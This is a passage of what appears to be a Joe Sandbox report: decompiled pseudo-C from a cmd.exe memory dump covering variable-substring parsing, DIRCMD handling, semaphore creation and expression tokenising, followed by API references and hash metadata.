                                    						_t131 = _a4;
                                    						L75:
                                    						 *_t131 = 0;
                                    						L23:
                                    						_v8 = 0xfffffffe;
                                    						E011D93F4(_t252);
                                    						 *[fs:0x0] = _v20;
                                    						return _t262;
                                    					}
                                    					__imp__longjmp(_t171, 0xffffffff);
                                    					L91:
                                    					_t173 = _v56;
                                    					if(_t173 == 0) {
                                    						L73:
                                    						_t262 = _v36;
                                    						goto L74;
                                    					}
                                    					__imp__longjmp(_t173, 0xffffffff);
                                    					L93:
                                    					_t230 = _t229 - 2;
                                    					_v64 = _t230;
                                    					_v68 = _t173 - 1;
                                    					L20:
                                    					 *_t230 = 0;
                                    					_t175 = _v52;
                                    					_t254 = _v40;
                                    					L21:
                                    					_t135 = _v32;
                                    					_v32 = _t135 + 2;
                                    					_t255 = E011DCFBC(_t254);
                                    					_v44 = _t255;
                                    					if( *_t135 == 0x3a) {
                                    						if( *0x1213cc9 == 0 || _t255 == 0) {
                                    							goto L22;
                                    						} else {
                                    							_t190 = _v32;
                                    							_t139 =  *_t190 & 0x0000ffff;
                                    							if(_t139 == 0x7e) {
                                    								_t191 =  &(_t190[1]);
                                    								_v32 = _t191;
                                    								_t256 = wcstol(_t191,  &_v32, 0);
                                    								_v72 = _t256;
                                    								_t176 = _v44;
                                    								if(_t256 >= 0) {
                                    									L50:
                                    									_t192 = _t176;
                                    									_t66 = _t192 + 2; // 0x11e7292
                                    									_t231 = _t66;
                                    									do {
                                    										_t142 =  *_t192;
                                    										_t192 = _t192 + 2;
                                    									} while (_t142 != 0);
                                    									if(_t256 >= _t192 - _t231 >> 1) {
                                    										_t195 = _t176;
                                    										_t109 = _t195 + 2; // 0x11e7292
                                    										_t232 = _t109;
                                    										do {
                                    											_t143 =  *_t195;
                                    											_t195 = _t195 + 2;
                                    										} while (_t143 != 0);
                                    										_t197 = _t195 - _t232 >> 1;
                                    										L54:
                                    										if(_t197 < 0) {
                                    											_t256 = 0;
                                    											L58:
                                    											_v72 = _t256;
                                    											_t144 = _v32;
                                    											if( *_t144 != 0x2c) {
                                    												_t257 = _t176 + _t256 * 2;
                                    												_t265 = _t176 + _t256 * 2;
                                    												_t104 = _t265 + 2; // 0x2
                                    												_t198 = _t104;
                                    												do {
                                    													_t145 =  *_t265;
                                    													_t265 = _t265 + 2;
                                    												} while (_t145 != 0);
                                    												L72:
                                    												_t267 = _t265 - _t198 >> 1;
                                    												L63:
                                    												_v48 = _t267;
                                    												_t233 = _t176;
                                    												_t78 = _t233 + 2; // 0x11e7292
                                    												_t199 = _t78;
                                    												do {
                                    													_t146 =  *_t233;
                                    													_t233 = _t233 + 2;
                                    												} while (_t146 != 0);
                                    												_t255 = _v44;
                                    												E011E6826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
                                    												if( *((short*)(_t255 + _t267 * 2)) != 0) {
                                    													 *((short*)(_t255 + _t267 * 2)) = 0;
                                    												}
                                    												_t149 = _v32;
                                    												_t237 =  &(_t149[1]);
                                    												_v32 = _t237;
                                    												_t131 = _a4;
                                    												if(( *_t149 & 0x0000ffff) != _a8) {
                                    													L98:
                                    													_t262 = _v36;
                                    													_t252 = _v40;
                                    													goto L75;
                                    												} else {
                                    													 *_t131 = _t237 - _v52 >> 1;
                                    													L45:
                                    													_t262 = _t255;
                                    													_v36 = _t262;
                                    													_t252 = _v40;
                                    													goto L23;
                                    												}
                                    											}
                                    											_t150 = _t144 + 2;
                                    											_v32 = _t150;
                                    											_t268 = wcstol(_t150,  &_v32, 0);
                                    											_v48 = _t268;
                                    											if(_t268 < 0) {
                                    												_t203 = _t176 + _t256 * 2;
                                    												_t240 = _t203 + 2;
                                    												do {
                                    													_t152 =  *_t203;
                                    													_t203 = _t203 + 2;
                                    												} while (_t152 != 0);
                                    												_t267 = _t268 + (_t203 - _t240 >> 1);
                                    												_v48 = _t267;
                                    												if(_t267 < 0) {
                                    													_t267 = 0;
                                    												}
                                    											}
                                    											_v48 = _t267;
                                    											_t257 = _t176 + _t256 * 2;
                                    											_t206 = _t257;
                                    											_t76 = _t206 + 2; // 0x2
                                    											_t241 = _t76;
                                    											do {
                                    												_t153 =  *_t206;
                                    												_t206 = _t206 + 2;
                                    											} while (_t153 != 0);
                                    											if(_t267 >= _t206 - _t241 >> 1) {
                                    												_t269 = _t257;
                                    												_t99 = _t269 + 2; // 0x2
                                    												_t198 = _t99;
                                    												do {
                                    													_t154 =  *_t269;
                                    													_t269 = _t269 + 2;
                                    												} while (_t154 != 0);
                                    												goto L72;
                                    											}
                                    											goto L63;
                                    										}
                                    										_t209 = _t176;
                                    										_t67 = _t209 + 2; // 0x11e7292
                                    										_t242 = _t67;
                                    										do {
                                    											_t155 =  *_t209;
                                    											_t209 = _t209 + 2;
                                    										} while (_t155 != 0);
                                    										if(_t256 >= _t209 - _t242 >> 1) {
                                    											_t258 = _t176;
                                    											_t110 = _t258 + 2; // 0x11e7292
                                    											_t212 = _t110;
                                    											do {
                                    												_t156 =  *_t258;
                                    												_t258 = _t258 + 2;
                                    											} while (_t156 != 0);
                                    											_t256 = _t258 - _t212 >> 1;
                                    										}
                                    										goto L58;
                                    									}
                                    									_t197 = _t256;
                                    									goto L54;
                                    								}
                                    								_t213 = _t176;
                                    								_t64 = _t213 + 2; // 0x11e7292
                                    								_t243 = _t64;
                                    								do {
                                    									_t157 =  *_t213;
                                    									_t213 = _t213 + 2;
                                    								} while (_t157 != 0);
                                    								_t256 = _t256 + (_t213 - _t243 >> 1);
                                    								_v72 = _t256;
                                    								goto L50;
                                    							}
                                    							if(_t139 == 0x2a) {
                                    								_t190 =  &(_t190[1]);
                                    								_v32 = _t190;
                                    								_v76 = 1;
                                    							} else {
                                    								_v76 = 0;
                                    							}
                                    							_t270 = _t190;
                                    							_v104 = _t270;
                                    							_t244 = _t270;
                                    							while(1) {
                                    								_t158 =  *_t190 & 0x0000ffff;
                                    								if(_t158 == 0 || _t158 == 0x3d) {
                                    									break;
                                    								}
                                    								_t190 =  &(_t244[1]);
                                    								_v32 = _t190;
                                    								_t244 = _t190;
                                    							}
                                    							if( *_t190 == 0) {
                                    								L100:
                                    								_t252 = _v40;
                                    								goto L73;
                                    							}
                                    							_t178 = _t244 - _t270;
                                    							_t179 = _t178 >> 1;
                                    							if(_t178 == 0) {
                                    								_t180 = _v56;
                                    								if(_t180 == 0) {
                                    									goto L100;
                                    								}
                                    								E011DC5A2(_t190, 0x234a, 1, _t244);
                                    								_t282 = _t279 + 0xc;
                                    								__imp__longjmp(_t180, 0xffffffff);
                                    								L103:
                                    								_t255 = _v44;
                                    								memcpy(_t255, ??, ??);
                                    								E011E1040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
                                    								goto L45;
                                    							}
                                    							_t162 =  &(_t244[1]);
                                    							_t271 = _t162;
                                    							_v80 = _t271;
                                    							while(1) {
                                    								_t247 = _t162;
                                    								_v32 = _t162;
                                    								_t219 =  *_t162 & 0x0000ffff;
                                    								if(_t219 == 0 || _t219 == _a8) {
                                    									break;
                                    								}
                                    								_t162 =  &(_t247[1]);
                                    							}
                                    							_t131 = _a4;
                                    							if( *_t162 == 0) {
                                    								goto L98;
                                    							}
                                    							_t220 =  &(_t247[1]);
                                    							_v32 = _t220;
                                    							_v56 = _t247 - _t271 >> 1;
                                    							 *_t131 = _t220 - _v52 >> 1;
                                    							if( *_t255 == 0) {
                                    								goto L45;
                                    							}
                                    							_t272 = _v60;
                                    							_t163 = E011E1040(_t272, 0x2000, _t255);
                                    							_v88 = _t272;
                                    							_v84 = _t255;
                                    							while(1) {
                                    								L42:
                                    								__imp___wcsnicmp(_t272, _v104, _t179);
                                    								_t282 = _t279 + 0xc;
                                    								if(_t163 != 0) {
                                    									break;
                                    								}
                                    								_t270 =  &(_t272[_t179]);
                                    								_push(_v56 + _v56);
                                    								_push(_v80);
                                    								if(_v76 != 0) {
                                    									goto L103;
                                    								}
                                    								_t163 = memcpy(_t255, ??, ??);
                                    								_t279 = _t282 + 0xc;
                                    								_t255 = _t255 + _v56 * 2;
                                    								_v84 = _t255;
                                    								_v88 = _t270;
                                    							}
                                    							_t163 =  *_t272 & 0x0000ffff;
                                    							 *_t255 = _t163;
                                    							_t255 = _t255 + 2;
                                    							_v84 = _t255;
                                    							_t272 =  &(_t272[1]);
                                    							_v88 = _t272;
                                    							if(_t163 != 0) {
                                    								goto L42;
                                    							}
                                    							_t255 = _v44;
                                    							goto L45;
                                    						}
                                    					}
                                    					L22:
                                    					 *_a4 = _v32 - _t175 >> 1;
                                    					_t262 = _t255;
                                    					_v36 = _t262;
                                    					_t252 = _v40;
                                    					goto L23;
                                    				}
                                    				_t226 = __edx;
                                    				_v32 = __edx;
                                    				_t273 = __edx;
                                    				_t229 =  *0x1213cc9;
                                    				while(1) {
                                    					_t165 =  *_t226 & 0x0000ffff;
                                    					if(_t165 == 0) {
                                    						break;
                                    					}
                                    					_t181 = _a8;
                                    					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
                                    						break;
                                    					} else {
                                    						_t13 =  &(_t273[1]); // 0x2
                                    						_t226 = _t13;
                                    						_v32 = _t226;
                                    						_t273 = _t226;
                                    						continue;
                                    					}
                                    				}
                                    				if( *_t226 == 0) {
                                    					goto L73;
                                    				}
                                    				_t175 = _v52;
                                    				if(_t273 == _t175) {
                                    					goto L73;
                                    				}
                                    				_t276 = (_t273 - _t175 >> 1) + 1;
                                    				_t252 = E011E00B0(_t276 + _t276);
                                    				_v40 = _t252;
                                    				if(_t252 == 0) {
                                    					goto L91;
                                    				}
                                    				_t19 = _t276 - 1; // 0x0
                                    				_t167 = _t19;
                                    				if(_t276 == 0) {
                                    					goto L21;
                                    				}
                                    				if(_t276 > 0x7fffffff) {
                                    					if(_t276 == 0) {
                                    						goto L21;
                                    					}
                                    					L95:
                                    					 *_t252 = 0;
                                    					goto L21;
                                    				}
                                    				if(_t167 > 0x7ffffffe) {
                                    					goto L95;
                                    				}
                                    				_t228 = _t175;
                                    				_t229 = _t252;
                                    				_t173 = 0;
                                    				while(1) {
                                    					_v68 = _t173;
                                    					_v64 = _t229;
                                    					_v96 = _t276;
                                    					_v92 = _t228;
                                    					_v100 = _t167;
                                    					if(_t276 == 0) {
                                    						goto L93;
                                    					}
                                    					if(_t167 == 0) {
                                    						L19:
                                    						if(_t276 == 0) {
                                    							goto L93;
                                    						}
                                    						goto L20;
                                    					}
                                    					_t260 =  *_t228 & 0x0000ffff;
                                    					if(_t260 == 0) {
                                    						goto L19;
                                    					}
                                    					 *_t229 = _t260;
                                    					_t229 =  &(_t229[0]);
                                    					_t228 =  &(_t228[1]);
                                    					_t276 = _t276 - 1;
                                    					_t167 = _t167 - 1;
                                    					_t173 = _t173 + 1;
                                    				}
                                    				goto L93;
                                    			}
                                    0x011d9135
                                    0x011d9138
                                    0x011d913b
                                    0x011d913b
                                    0x011d9143
                                    0x011f091c
                                    0x011f091c
                                    0x00000000
                                    0x011f091c
                                    0x011d914b
                                    0x011d914d
                                    0x011d914f
                                    0x011f0924
                                    0x011f0929
                                    0x00000000
                                    0x00000000
                                    0x011f0933
                                    0x011f0938
                                    0x011f093e
                                    0x011f0944
                                    0x011f0944
                                    0x011f0948
                                    0x011f0960
                                    0x00000000
                                    0x011f0960
                                    0x011d9155
                                    0x011d9158
                                    0x011d915a
                                    0x011d915d
                                    0x011d915d
                                    0x011d915f
                                    0x011d9162
                                    0x011d9168
                                    0x00000000
                                    0x00000000
                                    0x011d9170
                                    0x011d9170
                                    0x011d9179
                                    0x011d917c
                                    0x00000000
                                    0x00000000
                                    0x011d9182
                                    0x011d9185
                                    0x011d918c
                                    0x011d9194
                                    0x011d919a
                                    0x00000000
                                    0x00000000
                                    0x011d91a2
                                    0x011d91a7
                                    0x011d91ac
                                    0x011d91af
                                    0x011d91b2
                                    0x011d91b2
                                    0x011d91b7
                                    0x011d91bd
                                    0x011d91c2
                                    0x00000000
                                    0x00000000
                                    0x011d9322
                                    0x011d9325
                                    0x011d9326
                                    0x011d932d
                                    0x00000000
                                    0x00000000
                                    0x011d9334
                                    0x011d9339
                                    0x011d933f
                                    0x011d9342
                                    0x011d9345
                                    0x011d9345
                                    0x011d91c8
                                    0x011d91cb
                                    0x011d91ce
                                    0x011d91d1
                                    0x011d91d4
                                    0x011d91d7
                                    0x011d91dd
                                    0x00000000
                                    0x00000000
                                    0x011d91df
                                    0x00000000
                                    0x011d91df
                                    0x011d90fc
                                    0x011d90bf
                                    0x011d90c9
                                    0x011d90cb
                                    0x011d90cd
                                    0x011d90d0
                                    0x00000000
                                    0x011d90d0
                                    0x011d8fd3
                                    0x011d8fd5
                                    0x011d8fd8
                                    0x011d8fda
                                    0x011d8fe0
                                    0x011d8fe0
                                    0x011d8fe6
                                    0x00000000
                                    0x00000000
                                    0x011d8fe8
                                    0x011d8fef
                                    0x00000000
                                    0x011d8ffa
                                    0x011d8ffa
                                    0x011d8ffa
                                    0x011d8ffd
                                    0x011d9000
                                    0x00000000
                                    0x011d9000
                                    0x011d8fef
                                    0x011d900e
                                    0x00000000
                                    0x00000000
                                    0x011d9014
                                    0x011d9019
                                    0x00000000
                                    0x00000000
                                    0x011d9023
                                    0x011d902c
                                    0x011d902e
                                    0x011d9033
                                    0x00000000
                                    0x00000000
                                    0x011d9039
                                    0x011d9039
                                    0x011d903e
                                    0x00000000
                                    0x00000000
                                    0x011d9046
                                    0x011f08dd
                                    0x00000000
                                    0x00000000
                                    0x011f08e3
                                    0x011f08e5
                                    0x00000000
                                    0x011f08e5
                                    0x011d9051
                                    0x00000000
                                    0x00000000
                                    0x011d9057
                                    0x011d9059
                                    0x011d905b
                                    0x011d905d
                                    0x011d905d
                                    0x011d9060
                                    0x011d9063
                                    0x011d9066
                                    0x011d9069
                                    0x011d906e
                                    0x00000000
                                    0x00000000
                                    0x011d9076
                                    0x011d908e
                                    0x011d9090
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9090
                                    0x011d9078
                                    0x011d907e
                                    0x00000000
                                    0x00000000
                                    0x011d9080
                                    0x011d9083
                                    0x011d9086
                                    0x011d9089
                                    0x011d908a
                                    0x011d908b
                                    0x011d908b
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _wcsnicmp.MSVCRT ref: 011D91B7
                                    • wcstol.MSVCRT ref: 011D91FC
                                    • wcstol.MSVCRT ref: 011D928A
                                    • longjmp.MSVCRT(?,000000FF,2833377E,-00000002,?,00000000), ref: 011F08B2
                                    • longjmp.MSVCRT(?,000000FF), ref: 011F08C6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                    • String ID:
                                    • API String ID: 2863075230-0
                                    • Opcode ID: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                    • Instruction ID: 8a321189e41723879131518aa523104b78af93cb225adccae0a9bc184099677d
                                    • Opcode Fuzzy Hash: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                    • Instruction Fuzzy Hash: 8CF1E175D0020A9BDF2CCFA8C4846FEBBB5BF88708F19421DD916A7384EB715901CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E011E4F66(intOrPtr __ecx, signed int __edx) {
                                    				signed int _v8;
                                    				long _v20;
                                    				char _v24;
                                    				WCHAR* _v28;
                                    				void _v548;
                                    				int _v556;
                                    				char _v560;
                                    				void* _v564;
                                    				char _v1076;
                                    				void _v1084;
                                    				void* _v1096;
                                    				int _v1100;
                                    				WCHAR* _v1104;
                                    				WCHAR* _v1108;
                                    				char _v1112;
                                    				WCHAR* _v1116;
                                    				int _v1120;
                                    				void* _v1124;
                                    				intOrPtr _v1128;
                                    				void* _v1138;
                                    				int _v1142;
                                    				int _v1146;
                                    				int _v1150;
                                    				int _v1154;
                                    				int _v1158;
                                    				int _v1162;
                                    				int _v1166;
                                    				int _v1170;
                                    				short _v1172;
                                    				int _v1176;
                                    				WCHAR* _v1180;
                                    				int _v1184;
                                    				char _v1188;
                                    				int _v1192;
                                    				int _v1196;
                                    				intOrPtr _v1200;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t78;
                                    				WCHAR* _t97;
                                    				signed int _t101;
                                    				char _t112;
                                    				void* _t113;
                                    				void* _t135;
                                    				void* _t139;
                                    				intOrPtr _t140;
                                    				signed int _t141;
                                    				signed int _t143;
                                    				signed int _t144;
                                    
                                    				_t130 = __edx;
                                    				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
                                    				_t78 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t78 ^ _t143;
                                    				_v1200 = __ecx;
                                    				_v1180 = 0;
                                    				_v1172 = 0;
                                    				_v1196 = 0;
                                    				_v1192 = 0;
                                    				_v1188 = 0;
                                    				_t112 = 1;
                                    				_v1184 = 0;
                                    				_v1176 = 0;
                                    				_v1170 = 0;
                                    				_v1166 = 0;
                                    				_v1162 = 0;
                                    				_v1158 = 0;
                                    				_v1154 = 0;
                                    				_v1150 = 0;
                                    				_v1146 = 0;
                                    				_v1142 = 0;
                                    				asm("stosd");
                                    				_v564 = 0;
                                    				asm("stosd");
                                    				_v560 = 1;
                                    				_v556 = 0x104;
                                    				asm("stosd");
                                    				asm("stosw");
                                    				_v1124 = 0;
                                    				_v1120 = 0;
                                    				_v1116 = 0;
                                    				_v1112 = 0;
                                    				_v1108 = 0;
                                    				_v1104 = 0;
                                    				_v1100 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				memset( &_v1084, 0, 0x104);
                                    				_t144 = _t143 + 0xc;
                                    				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					L14:
                                    					__imp__??_V@YAXPAX@Z(_v564);
                                    					_pop(_t135);
                                    					_pop(_t139);
                                    					_pop(_t113);
                                    					return E011E6FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
                                    				}
                                    				_t140 =  *0x1213cd8;
                                    				_v1192 = 6;
                                    				_v20 = 0x104;
                                    				_v1188 = 0;
                                    				_v1196 = 0x8000;
                                    				_v1124 = 0;
                                    				_v1104 = 0;
                                    				_v28 = 0;
                                    				_v24 = 1;
                                    				memset( &_v548, 0, 0x104);
                                    				_t144 = _t144 + 0xc;
                                    				if(E011E0C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
                                    					L13:
                                    					__imp__??_V@YAXPAX@Z(_v28);
                                    					goto L14;
                                    				}
                                    				_t97 = _v28;
                                    				if(_t97 == 0) {
                                    					_t97 =  &_v548;
                                    				}
                                    				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
                                    					_t122 = _v28;
                                    					if(_v28 == 0) {
                                    						_t122 =  &_v548;
                                    					}
                                    					if(E011DCB48( &_v1196) == _t112) {
                                    						_push(0);
                                    						_push(0x2377);
                                    						E011DC5A2(_t122);
                                    					}
                                    				}
                                    				_t130 =  &_v1196;
                                    				if(E011DCB48( &_v1196) != _t112) {
                                    					_t101 = _v1196;
                                    					if((_t101 & 0x00000040) != 0) {
                                    						_t101 = _t101 & 0xfffb79fb;
                                    						_v1196 = _t101;
                                    					}
                                    					if((_t101 & 0x00000400) != 0) {
                                    						_v1196 = _t101 & 0xfffffdbb;
                                    					}
                                    					_t124 = _v564;
                                    					if(_v564 == 0) {
                                    						_t124 =  &_v1084;
                                    					}
                                    					_t130 = _v556;
                                    					E011E36CB(_t112, _t124, _v556, 0);
                                    					if(_v1128 == 0) {
                                    						_t125 = _v564;
                                    						_v1124 = _t112;
                                    						if(_v564 == 0) {
                                    							_t125 =  &_v1084;
                                    						}
                                    						_v1120 = E011E297B(_t125);
                                    						_v1112 = _t112;
                                    						_v1116 = 0;
                                    						_v1108 = 0;
                                    					}
                                    					_t112 = E011E2DD2( &_v1188, _t130);
                                    					_t106 = _v556;
                                    					if(_v556 == 0) {
                                    						_t106 =  &_v1076;
                                    					}
                                    					E011E0BFC(_t106, _v548);
                                    					E011E2A06(_t140, 0);
                                    				}
                                    				goto L13;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011E501F
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • memset.MSVCRT ref: 011E5098
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50A7
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50E1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E516F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E517D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$EnvironmentVariable
                                    • String ID: DIRCMD
                                    • API String ID: 1405722092-1465291664
                                    • Opcode ID: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                    • Instruction ID: 9df05a81d3d1e3ea09cbe4502f8e4b083b1439eed2b9887544558e7936430aac
                                    • Opcode Fuzzy Hash: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                    • Instruction Fuzzy Hash: 7E7139B160CB829FD768CFA9D88869BBBE5BFD4308F04492EF59983250DB309544CB57
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E011F196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
                                    				void* _v0;
                                    				signed int _v8;
                                    				char _v532;
                                    				void** _v536;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t20;
                                    				short* _t26;
                                    				void* _t29;
                                    				void* _t31;
                                    				signed int* _t38;
                                    				void** _t40;
                                    				long _t41;
                                    				signed int _t42;
                                    				signed int _t47;
                                    				char* _t48;
                                    				void* _t55;
                                    				signed int _t57;
                                    				signed int _t59;
                                    				signed int _t60;
                                    				void* _t61;
                                    				void* _t63;
                                    				void* _t64;
                                    				signed int _t65;
                                    
                                    				_t20 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t20 ^ _t65;
                                    				_t59 = _a12;
                                    				_t40 = __ecx;
                                    				_v536 = __ecx;
                                    				_t24 = _t59 & 0x80000000 | _a16;
                                    				if((_t59 & 0x80000000 | _a16) != 0) {
                                    					E011E80F2(_t24);
                                    				}
                                    				E011E1040( &_v532, 0x104, _a4);
                                    				_t57 = 0x104;
                                    				_t26 =  &_v532;
                                    				while( *_t26 != 0) {
                                    					_t26 = _t26 + 2;
                                    					_t57 = _t57 - 1;
                                    					if(_t57 != 0) {
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				asm("sbb ecx, ecx");
                                    				_t47 =  ~_t57 & 0x00000104 - _t57;
                                    				if(_t57 != 0) {
                                    					_t38 =  &_v532 + _t47 * 2;
                                    					_t64 = 0x104 - _t47;
                                    					if(_t64 == 0) {
                                    						L14:
                                    						_t38 = _t38 - 2;
                                    					} else {
                                    						_t55 = 0x7ffffffe;
                                    						_t57 = L"_p0" - _t38;
                                    						while(_t55 != 0) {
                                    							_t42 =  *(_t38 + _t57) & 0x0000ffff;
                                    							if(_t42 == 0) {
                                    								break;
                                    							} else {
                                    								 *_t38 = _t42;
                                    								_t55 = _t55 - 1;
                                    								_t38 =  &(_t38[0]);
                                    								_t64 = _t64 - 1;
                                    								if(_t64 != 0) {
                                    									continue;
                                    								} else {
                                    									L13:
                                    									_t40 = _v536;
                                    									goto L14;
                                    								}
                                    							}
                                    							goto L16;
                                    						}
                                    						if(_t64 != 0) {
                                    							_t40 = _v536;
                                    						} else {
                                    							goto L13;
                                    						}
                                    					}
                                    					L16:
                                    					 *_t38 = 0;
                                    				}
                                    				_t60 = _t59 & 0x7fffffff;
                                    				_t29 = _t60;
                                    				if(_t60 <= 0) {
                                    					_t29 = 1;
                                    				}
                                    				_t48 =  &_v532;
                                    				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
                                    				_t61 = _t29;
                                    				if(_t61 == 0) {
                                    					_t57 = 0x1621;
                                    					_t63 = E011F2913("internal\\sdk\\inc\\wil\\ResultMacros.h");
                                    					if(_t63 >= 0) {
                                    						goto L25;
                                    					} else {
                                    						_t57 = 0x84;
                                    						E011F292C("wil", _t63);
                                    						_t31 = _t63;
                                    					}
                                    				} else {
                                    					_t63 =  *_t40;
                                    					if(_t63 != 0) {
                                    						_t41 = GetLastError();
                                    						if(CloseHandle(_t63) == 0) {
                                    							_push(_t48);
                                    							_t57 = 0x879;
                                    							E011F2D56();
                                    						}
                                    						SetLastError(_t41);
                                    						_t40 = _v536;
                                    					}
                                    					 *_t40 = _t61;
                                    					L25:
                                    					_t31 = 0;
                                    				}
                                    				return E011E6FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
                                    			}





























                                    APIs
                                    • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 011F1A4D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F1A5F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 011F1A68
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1A81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CloseCreateHandleSemaphore
                                    • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                    • API String ID: 2276426104-46676964
                                    • Opcode ID: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                    • Instruction ID: f9ea3adfe148da17dcd83e22b9dbe5fc151c1b47d0200f660f2caf3e00ac0daf
                                    • Opcode Fuzzy Hash: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                    • Instruction Fuzzy Hash: 91412332B4016AEBDB2DDE28C958BAA37E5FF94310F15416CEA05E7284DB70CD04CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011D6785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
                                    				signed short* _t8;
                                    				signed short _t9;
                                    				long _t13;
                                    				signed short** _t18;
                                    				signed short _t25;
                                    				long _t32;
                                    				wchar_t* _t33;
                                    				signed short** _t34;
                                    
                                    				_t18 = __edx;
                                    				_t34 = __ecx;
                                    				E011D9794(__ecx);
                                    				_t32 =  *( *_t34) & 0x0000ffff;
                                    				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
                                    					L12:
                                    					return 0;
                                    				} else {
                                    					_t33 = L"+-~!";
                                    					if(wcschr(_t33, _t32) != 0) {
                                    						goto L12;
                                    					}
                                    					_t8 =  *_t34;
                                    					 *_t18 = _t8;
                                    					while(1) {
                                    						_t9 =  *_t8 & 0x0000ffff;
                                    						_t25 = _t9;
                                    						if(_t9 == 0) {
                                    							break;
                                    						}
                                    						_t13 = _t25 & 0x0000ffff;
                                    						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
                                    							break;
                                    						} else {
                                    							 *_t34 =  &(( *_t34)[1]);
                                    							_t8 =  *_t34;
                                    							continue;
                                    						}
                                    					}
                                    					 *_a4 =  *_t34;
                                    					return 1;
                                    				}
                                    			}












                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
